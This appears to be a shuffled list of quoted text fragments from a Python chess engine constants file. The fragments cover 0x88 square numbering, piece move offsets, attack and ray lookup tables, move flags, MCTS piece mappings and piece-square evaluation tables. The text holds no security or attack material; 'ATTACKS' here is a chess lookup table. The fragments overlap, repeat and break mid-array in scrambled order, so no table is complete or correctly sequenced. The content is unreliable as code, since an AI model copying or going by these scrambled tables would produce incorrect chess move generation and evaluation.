0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0,", "0, 0, 0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16,", "1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5,", "0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20,", "0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0,", "1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "[-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5,", "0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0,", "2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5,", "0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0,", "24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0,", "17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17,", ": 5, 'k' : 6, } MCTS_DECODER = { 1 : 'p', 2", "'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING = 'k'", "0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0,", "RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8':", "97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103,", "0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0,", "[5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0,", "2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5],", "-2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0,", "'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n'", "[ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0,", "32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38,", "99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113,", "98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112,", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0,", "1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0,", "'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0,", "6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2", "'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4':", "0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0,", "0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [", "0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0,", "6, } MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 :", "20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53,", "17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0,", "'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS", "'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR", "0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0,", "39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53,", "117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag':", "KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0,", "2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0,", "QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w", "1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0,", "8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 =", "'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1':", "[ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [", "3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5,", "0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0,", "0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0,", "5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0],", "[ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0,", "2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24,", "'d5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4':", "86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100,", "RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1,", "0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0]", "# Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31,", "= { 'w' : 1, 'b' : -1 } ATTACKS = [ 20,0,", "] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0],", "-2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ],", "[ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0,", "'d6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5':", "move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b':", "[ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS =", "80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86,", "0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5':", "1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5,", "-1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0,", "0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0,", "-3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0,", "1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0,", "[ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0,", "0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53,", "0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0,", "can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31,", "'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3':", "0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "[-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5,", "1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0,", "1 : 'p', 2 : 'n', 3 : 'b', 4 : 'r', 5", "[0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0,", "0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0,", "SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0,", "1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "-1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0,", "0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0,", "# Directions pawns can move: forward 1, forward 2, right (capture), left (capture)", "1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0,", "-5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5,", "1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0,", ": 1, 'n' : 2, 'b' : 3, 'r' : 4, 'q' :", "0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0,", "####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p'", "[{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']},", "-3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5,", "0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0,", "0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0,", "] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q':", "'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1':", "0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15,", "-3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0,", "-2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [", "-4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0,", "5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1", "1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0],", "0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0,", "0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20,", "{'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}]", "[0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0,", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0,", "0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6,", "1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0],", "-1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0,", "1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0,", "0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24,", "-3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0,", "1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0, 0,", "16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56,", "19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33,", "'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6':", "65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71,", "= { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square':", "-2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [", "3, 'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER =", "0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0,", "-3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0,", "0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0,", "0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ]", "ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [", "= [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0,", "3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0,", "0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0,", "= 2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0,", "-3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0,", "3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c',", "2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0,", "'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS", "0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "[ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0,", "0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0,", "0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20,", "17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1]", "0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0,", "18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32,", "1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0,", "= { 'p' : 1, 'n' : 2, 'b' : 3, 'r' :", "0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1,", "0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0,", "0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0,", "0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15,", "0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0,", "'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'],", "0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24,", "0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ]", "1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n'", "= 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES =", "0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0,", "{ 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5,", "[ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0,", "113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119", "[ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5,", "-1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' :", "0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,", "= -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK =", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0,", "{ 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k',", "0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [", "0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS", "= 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1'", "0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5,", "0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5],", "-1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0,", "[ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0,", "'n', 3 : 'b', 4 : 'r', 5 : 'q', 6 : 'k'", "0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16,", "'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7':", "PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15]", "-16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' :", "0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0,", "0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0],", "4, 'q' : 5, 'k' : 6, } MCTS_DECODER = { 1 :", "'b' ROOK = 'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK'", ": 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 }", "-0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0,", "[ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5,", "0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b'", "0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0,", "36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50,", "0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0,", "0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0,", "0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "-1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r'", "0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0,", "1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0,", "= 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 =", "-3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [", "0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0,", "0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0,", "-17, -15] } # Directions different pieces can move PIECE_OFFSETS = { 'n':", "3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [", "0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0],", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24,", "SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] }", "1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0,", "0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0,", "-1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0,", "0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0,", "0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,", ": 6, } MCTS_DECODER = { 1 : 'p', 2 : 'n', 3", "-1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0,", "0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0,", "forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17,", "0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20,", "'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1,", "0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0,", "0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0,", "'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 =", "3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5],", "0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16,", "0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0,", "'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE':", "0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5,", "0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17,", "17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,", "0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5,", "0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0,", "0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20,", "0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15,", "0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0,", "0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0]", "2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2,", "0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,", "0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0,", "0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0, 0, 0,", "0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0,", "-4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0,", "0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],", "0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0,", "PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0,", "0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0,", "0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0,", "5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5,", "38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52,", "0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0,", "0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 }", "0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ 